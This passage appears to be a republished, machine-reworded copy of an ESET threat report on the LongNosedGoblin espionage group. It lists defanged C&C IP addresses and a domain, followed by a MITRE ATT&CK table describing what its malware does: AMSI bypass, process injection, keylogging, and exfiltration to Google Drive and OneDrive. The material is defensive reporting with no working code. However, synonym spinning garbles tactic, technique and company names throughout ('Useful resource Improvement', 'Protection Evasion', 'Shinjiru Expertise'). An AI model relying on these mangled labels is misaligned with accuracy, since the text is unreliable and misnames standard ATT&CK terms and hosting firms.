width=\"113\">NosyDownloader C&amp;C server.<\/td>\n<\/tr>\n<tr>\n<td width=\"142\"><span style=\"font-family: courier new, courier, monospace;\">118.107.234[.]29<\/span><\/td>\n<td width=\"190\">N\/A<\/td>\n<td width=\"104\">IRT\u2011IPSERVERONE\u2011MY<\/td>\n<td width=\"71\">2023\u201103\u201120<\/td>\n<td width=\"113\">ReverseSocks5 server.<\/td>\n<\/tr>\n<tr>\n<td width=\"142\"><span style=\"font-family: courier new, courier, monospace;\">101.99.88[.]188<\/span><\/td>\n<td width=\"190\"><span style=\"font-family: courier new, courier, monospace;\">www.privateness<wbr\/>policy-my[.]com<\/span><\/td>\n<td width=\"104\">Shinjiru Expertise Sdn Bhd administrator<\/td>\n<td width=\"71\">2024\u201110\u201123<\/td>\n<td width=\"113\">NosyDownloader C&amp;C server.<\/td>\n<\/tr>\n<tr>\n<td width=\"142\"><span style=\"font-family: courier new, courier, monospace;\">38.54.17[.]131<\/span><\/td>\n<td width=\"190\">N\/A<\/td>\n<td width=\"104\">Kaopu Cloud HK Restricted<\/td>\n<td width=\"71\">2025\u201103\u201105<\/td>\n<td width=\"113\">Server internet hosting malware, probably Cobalt Strike.<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<h2>MITRE ATT&amp;CK strategies<\/h2>\n<p>This desk was constructed utilizing <a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/attack.mitre.org\/resources\/versions\/\">model 18<\/a> of the MITRE ATT&amp;CK framework<strong>.<\/strong><\/p>\n<table border=\"1\" width=\"642\" cellspacing=\"0\" cellpadding=\"0\">\n<thead>\n<tr>\n<td width=\"113\"><strong>Tactic<\/strong><\/td>\n<td width=\"113\"><strong>ID<\/strong><\/td>\n<td width=\"151\"><strong>Identify<\/strong><\/td>\n<td width=\"265\"><strong>Description<\/strong><\/td>\n<\/tr>\n<\/thead>\n<tbody>\n<tr>\n<td rowspan=\"2\" width=\"113\"><strong>Useful resource Improvement<\/strong><\/td>\n<td width=\"113\"><a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/attack.mitre.org\/techniques\/T1585\/003\/\">T1585.003<\/a><\/td>\n<td width=\"151\">Set up Accounts: Cloud Accounts<\/td>\n<td width=\"265\">LongNosedGoblin created accounts on cloud-based providers for C&amp;C communication.<\/td>\n<\/tr>\n<tr>\n<td width=\"113\"><a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/attack.mitre.org\/techniques\/T1588\/001\/\">T1588.001<\/a><\/td>\n<td width=\"151\">Get hold of Capabilities: Malware<\/td>\n<td width=\"265\">LongNosedGoblin possible used shared malware that we named NosyDoor.<\/td>\n<\/tr>\n<tr>\n<td rowspan=\"3\" width=\"113\"><strong>Execution<\/strong><\/td>\n<td width=\"113\"><a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/attack.mitre.org\/versions\/v18\/techniques\/T1059\/001\">T1059.001<\/a><\/td>\n<td width=\"151\">Command and Scripting Interpreter: PowerShell<\/td>\n<td width=\"265\">NosyDownloader executes PowerShell instructions.<\/td>\n<\/tr>\n<tr>\n<td width=\"113\"><a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/attack.mitre.org\/versions\/v18\/techniques\/T1059\/003\">T1059.003<\/a><\/td>\n<td width=\"151\">Command and Scripting Interpreter: Home windows Command Shell<\/td>\n<td width=\"265\">NosyDoor could execute instructions through <sub>cmd.exe<\/sub>.<\/td>\n<\/tr>\n<tr>\n<td width=\"113\"><a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/attack.mitre.org\/versions\/v18\/techniques\/T1106\/\">T1106<\/a><\/td>\n<td width=\"151\">Native API<\/td>\n<td width=\"265\">NosyStealer Stage 1 executes the following stage through the <span style=\"font-family: courier new, courier, monospace;\">LoadLibraryW<\/span> API.<\/td>\n<\/tr>\n<tr>\n<td rowspan=\"2\" width=\"113\"><strong>Persistence<\/strong><\/td>\n<td width=\"113\"><a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/attack.mitre.org\/versions\/v18\/techniques\/T1053\/005\">T1053.005<\/a><\/td>\n<td width=\"151\">Scheduled Process\/Job: Scheduled Process<\/td>\n<td width=\"265\">NosyDoor and NosyStealer are endured utilizing Home windows scheduled duties.<\/td>\n<\/tr>\n<tr>\n<td width=\"113\"><a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/attack.mitre.org\/versions\/v18\/techniques\/T1574\/014\">T1574.014<\/a><\/td>\n<td width=\"151\">Hijack Execution Circulate: AppDomainManager<\/td>\n<td width=\"265\">NosyDoor Stage 2 makes use of AppDomainManager injection to run malicious code.<\/td>\n<\/tr>\n<tr>\n<td rowspan=\"10\" width=\"113\"><strong>Protection Evasion<\/strong><\/td>\n<td width=\"113\"><a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/attack.mitre.org\/versions\/v18\/techniques\/T1027\/013\/\">T1027.013<\/a><\/td>\n<td width=\"151\">Obfuscated Information or Data: Encrypted\/Encoded File<\/td>\n<td width=\"265\">Malicious recordsdata embedded in NosyDoor Stage 1 are encrypted through DES.<\/td>\n<\/tr>\n<tr>\n<td width=\"113\"><a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/attack.mitre.org\/techniques\/T1027\/015\/\">T1027.015<\/a><\/td>\n<td width=\"151\">Obfuscated Information or Data: Compression<\/td>\n<td width=\"265\">NosyDownloader Stage 4 is compressed utilizing gzip.<\/td>\n<\/tr>\n<tr>\n<td width=\"113\"><a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/attack.mitre.org\/versions\/v18\/techniques\/T1622\">T1622<\/a><\/td>\n<td width=\"151\">Debugger Evasion<\/td>\n<td width=\"265\">NosyLogger doesn&#8217;t function if a debugger is current.<\/td>\n<\/tr>\n<tr>\n<td width=\"113\"><a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/attack.mitre.org\/versions\/v18\/techniques\/T1480\">T1480<\/a><\/td>\n<td width=\"151\">Execution Guardrails<\/td>\n<td width=\"265\">Some samples of NosyDoor function solely on machines with particular names.<\/td>\n<\/tr>\n<tr>\n<td width=\"113\"><a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/attack.mitre.org\/versions\/v18\/techniques\/T1564\/003\">T1564.003<\/a><\/td>\n<td width=\"151\">Cover Artifacts: Hidden Window<\/td>\n<td width=\"265\">NosyDownloader creates a PowerShell course of with a hidden window.<\/td>\n<\/tr>\n<tr>\n<td width=\"113\"><a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/attack.mitre.org\/versions\/v18\/techniques\/T1562\/001\">T1562.001<\/a><\/td>\n<td width=\"151\">Impair Defenses: Disable or Modify Instruments<\/td>\n<td width=\"265\">NosyDoor Stage 2, NosyStealer Stage 3, and NosyDownloader bypass AMSI.<\/td>\n<\/tr>\n<tr>\n<td width=\"113\"><a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/attack.mitre.org\/versions\/v18\/techniques\/T1036\/005\">T1036.005<\/a><\/td>\n<td width=\"151\">Masquerading: Match Official Identify or Location<\/td>\n<td width=\"265\">NosyHistorian Stage 1 was noticed with the identify <span style=\"font-family: courier new, courier, monospace;\">Registry.pol<\/span>, masquerading as a Registry Coverage file.<\/td>\n<\/tr>\n<tr>\n<td width=\"113\"><a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/attack.mitre.org\/versions\/v18\/techniques\/T1218\">T1218<\/a><\/td>\n<td width=\"151\">Signed Binary Proxy Execution<\/td>\n<td width=\"265\">NosyDoor Stage 1 executes the following stage by leveraging the respectable <span style=\"font-family: courier new, courier, monospace;\">UevAppMonitor.exe<\/span>.<\/td>\n<\/tr>\n<tr>\n<td width=\"113\"><a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/attack.mitre.org\/versions\/v18\/techniques\/T1055\">T1055<\/a><\/td>\n<td width=\"151\">Course of Injection<\/td>\n<td width=\"265\">One noticed NosyStealer Stage 2 injects Stage 3 to <span style=\"font-family: courier new, courier, monospace;\">pmp.exe<\/span> through <span style=\"font-family: courier new, courier, monospace;\">CreateRemoteThread<\/span>. The opposite noticed pattern injects to <span style=\"font-family: courier new, courier, monospace;\">notepad.exe<\/span> through <span style=\"font-family: courier new, courier, monospace;\">SetThreadContext<\/span> with <span style=\"font-family: courier new, courier, monospace;\">ResumeThread<\/span>.<\/td>\n<\/tr>\n<tr>\n<td width=\"113\"><a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/attack.mitre.org\/versions\/v18\/techniques\/T1620\">T1620<\/a><\/td>\n<td width=\"151\">Reflective Code Loading<\/td>\n<td width=\"265\"><a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/attack.mitre.org\/versions\/v18\/software\/S0695\/\" target=\"_blank\" rel=\"noopener\">Donut<\/a> has been used to execute NosyStealer Stage 3 and Stage 4 in reminiscence.<\/td>\n<\/tr>\n<tr>\n<td rowspan=\"3\" width=\"113\"><strong>Discovery<\/strong><\/td>\n<td width=\"113\"><a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/attack.mitre.org\/versions\/v18\/techniques\/T1217\">T1217<\/a><\/td>\n<td width=\"151\">Browser Data Discovery<\/td>\n<td width=\"265\">NosyHistorian collects browser historical past from Google Chrome, Microsoft Edge, and Mozilla Firefox.<\/td>\n<\/tr>\n<tr>\n<td width=\"113\"><a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/attack.mitre.org\/versions\/v18\/techniques\/T1083\">T1083<\/a><\/td>\n<td width=\"151\">File and Listing Discovery<\/td>\n<td width=\"265\">NosyDoor can listing recordsdata and directories.<\/td>\n<\/tr>\n<tr>\n<td width=\"113\"><a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/attack.mitre.org\/versions\/v18\/techniques\/T1082\">T1082<\/a><\/td>\n<td width=\"151\">System Data Discovery<\/td>\n<td width=\"265\">NosyDoor obtains system data as a part of C&amp;C beaconing.<\/td>\n<\/tr>\n<tr>\n<td rowspan=\"4\" width=\"113\"><strong>Assortment<\/strong><\/td>\n<td width=\"113\"><a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/attack.mitre.org\/versions\/v18\/techniques\/T1056\/001\">T1056.001<\/a><\/td>\n<td width=\"151\">Enter Seize: Keylogging<\/td>\n<td width=\"265\">NosyLogger logs keystrokes.<\/td>\n<\/tr>\n<tr>\n<td width=\"113\"><a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/attack.mitre.org\/versions\/v18\/techniques\/T1125\">T1125<\/a><\/td>\n<td width=\"151\">Video Seize<\/td>\n<td width=\"265\">LongNosedGoblin has used video recording software program, possible FFmpeg, to seize audio and video.<\/td>\n<\/tr>\n<tr>\n<td width=\"113\"><a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/attack.mitre.org\/versions\/v18\/techniques\/T1560\/\">T1560<\/a><\/td>\n<td width=\"151\">Archive Collected Information<\/td>\n<td width=\"265\">NosyLogger encrypts collected knowledge through AES.<\/td>\n<\/tr>\n<tr>\n<td width=\"113\"><a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/attack.mitre.org\/versions\/v18\/techniques\/T1074\/001\/\">T1074.001<\/a><\/td>\n<td width=\"151\">Information Staged: Native Information Staging<\/td>\n<td width=\"265\">NosyLogger shops pressed keys, window names, and clipboard content material to a file at a hardcoded path.<\/td>\n<\/tr>\n<tr>\n<td rowspan=\"5\" width=\"113\"><strong>Command and Management<\/strong><\/td>\n<td width=\"113\"><a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/attack.mitre.org\/versions\/v18\/techniques\/T1071\/001\">T1071.001<\/a><\/td>\n<td width=\"151\">Utility Layer Protocol: Internet Protocols<\/td>\n<td width=\"265\">NosyDownloader makes use of HTTP to obtain additional payload.<\/td>\n<\/tr>\n<tr>\n<td width=\"113\"><a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/attack.mitre.org\/versions\/v18\/techniques\/T1105\/\">T1105<\/a><\/td>\n<td width=\"151\">Ingress Instrument Switch<\/td>\n<td width=\"265\">NosyDoor and NosyDownloader can obtain and run subsequent payloads.<\/td>\n<\/tr>\n<tr>\n<td width=\"113\"><a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/attack.mitre.org\/versions\/v18\/techniques\/T1102\/002\">T1102.002<\/a><\/td>\n<td width=\"151\">Internet Service: Bidirectional Communication<\/td>\n<td width=\"265\">NosyDoor makes use of Microsoft OneDrive as its C&amp;C server. NosyStealer makes use of Google Docs to obtain a set off command and to ship debug messages, and Google Drive to exfiltrate browser knowledge.<\/td>\n<\/tr>\n<tr>\n<td width=\"113\"><a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/attack.mitre.org\/techniques\/T1573\/001\/\">T1573.001<\/a><\/td>\n<td width=\"151\">Encrypted Channel: Symmetric Cryptography<\/td>\n<td width=\"265\">NosyDoor encrypts C&amp;C command outputs through AES.<\/td>\n<\/tr>\n<tr>\n<td width=\"113\"><a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/attack.mitre.org\/techniques\/T1573\/002\/\">T1573.002<\/a><\/td>\n<td width=\"151\">Encrypted Channel: Uneven Cryptography<\/td>\n<td width=\"265\">NosyDoor makes use of RSA to encrypt metadata that&#8217;s despatched to the C&amp;C server.<\/td>\n<\/tr>\n<tr>\n<td width=\"113\"><strong>Exfiltration<\/strong><\/td>\n<td width=\"113\"><a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/attack.mitre.org\/versions\/v18\/techniques\/T1567\/002\">T1567.002<\/a><\/td>\n<td width=\"151\">Exfiltration Over Internet Service: Exfiltration to Cloud Storage<\/td>\n<td width=\"265\">NosyStealer exfiltrates browser knowledge to Google Drive.<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p><a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/www.eset.com\/int\/business\/services\/threat-intelligence\/?utm_source=welivesecurity.com&amp;utm_medium=referral&amp;utm_campaign=wls-research&amp;utm_content=longnosedgoblin-tries-sniff-out-governmental-affairs-southeast-asia-japan&amp;sfdccampaignid=7011n0000017htTAAQ\" target=\"_blank\" rel=\"noopener\"><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/web-assets.esetstatic.com\/wls\/eti-eset-threat-intelligence.png\" alt=\"\" width=\"915\" height=\"296\"\/><\/a><\/p>\n<\/div>\n\n","protected":false},"excerpt":{"rendered":"<p>In 2024, ESET researchers seen beforehand undocumented malware within the community of a Southeast Asian governmental entity. This led us to uncover much more new malware on the identical system, none of which had substantial ties to any beforehand tracked risk actors. Based mostly on our findings, we determined to attribute the malicious instruments to [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":9980,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[58],"tags":[7045,6465,7044,2691,7042,7043,6907],"class_list":["post-9978","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-cybersecurity","tag-affairs","tag-asia","tag-governmental","tag-japan","tag-longnosedgoblin","tag-sniff","tag-southeast"],"_links":{"self":[{"href":"https:\/\/techtrendfeed.com\/index.php?rest_route=\/wp\/v2\/posts\/9978","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/techtrendfeed.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/techtrendfeed.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/techtrendfeed.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/techtrendfeed.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=9978"}],"version-history":[{"count":1,"href":"https:\/\/techtrendfeed.com\/index.php?rest_route=\/wp\/v2\/posts\/9978\/revisions"}],"predecessor-version":[{"id":9979,"href":"https:\/\/techtrendfeed.com\/index.php?rest_route=\/wp\/v2\/posts\/9978\/revisions\/9979"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/techtrendfeed.com\/index.php?rest_route=\/wp\/v2\/media\/9980"}],"wp:attachment":[{"href":"https:\/\/techtrendfeed.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=9978"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/techtrendfeed.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=9978"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/techtrendfeed.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=9978"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}<!-- This website is optimized by Airlift. Learn more: https://airlift.net. Template:. Learn more: https://airlift.net. Template: 69d9690a190636c2e0989534. Config Timestamp: 2026-04-10 21:18:02 UTC, Cached Timestamp: 2026-05-27 02:28:44 UTC -->